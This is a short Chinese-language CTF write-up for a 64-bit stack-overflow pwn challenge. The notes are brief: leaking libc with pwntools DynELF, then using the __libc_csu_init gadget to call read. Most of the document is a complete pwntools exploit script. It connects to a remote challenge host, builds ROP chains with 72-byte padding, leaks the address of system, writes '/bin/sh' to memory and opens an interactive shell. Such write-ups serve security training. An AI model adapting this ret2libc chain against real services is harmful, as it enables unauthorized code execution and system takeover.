1.题目
1.1.保护机制
没开canary和ASLR,只开了NX
1.2.关键代码
2.思路
很明显就是一个简单栈溢出漏洞,但是发现没有提供lib文件,导致我们不能直接去泄漏puts加载地址然后计算偏移得到system的地址,pwn库提供了一个通过泄漏地址遍历lib库
d = DynELF(leak,elf=elf)
system_addr = d.lookup('system','libc')
leak参数是一个函数,函数参数为地址,地址由DynELF提供,函数功能就是通过参数地址泄漏出该地址指向的地址,通过上面的代码可以泄漏出system函数的加载地址
重点1:使用DynELF泄漏system函数,编写leak函数中泄漏的地址要用while循环接收以免接收不到
重点2:使用read函数将/bin/sh\x00字符串写入到内存中,read的参数如果没有gadget提供,利用init万能gadget,注意有个add esp,8
from pwn import *
#context(arch="amd64",os="linux",log_level="debug")
con = remote('111.200.241.244',59165)
#con = process('./pwn')
elf = ELF('./pwn')
puts_addr = elf.plt['puts']
read_addr = elf.got['read']
start_addr = 0x400550
pop_rdi = 0x400763
gadget1 = 0x40075A
gadget2 = 0x400740
str_addr = 0x601040
def leak(addr):
payload = "A"*72 + p64(pop_rdi) + p64(addr) + p64(puts_addr) + p64(start_addr)
payload = payload.ljust(200,'B')
con.send(payload)
con.recvuntil("bye~\n")
up = ''
content = ''
while True:
c = con.recv(numb=1, timeout=0.1)
if up == '\n' and c == "":
content = content[:-1]+'\x00'
break
else:
content += c
up = c
content = content[:4]
return content
d = DynELF(leak,elf=elf)
system_addr = d.lookup('system','libc')
# call read
payload = "A"*72
payload += p64(gadget1)
payload += p64(0)
payload += p64(1)
payload += p64(read_addr)
payload += p64(8)
payload += p64(str_addr)
payload += p64(0)
payload += p64(gadget2)
payload += "\x00"* 56 # add rsp,8
payload += p64(start_addr)
payload = payload.ljust(200,'B')
# input str
con.send(payload)
con.recvuntil("bye~\n")
con.send('/bin/sh\x00')
# call system
payload = "A"*72
payload += p64(pop_rdi) + p64(str_addr) + p64(system_addr)
payload = payload.ljust(200,"B")
con.send(payload)
con.interactive()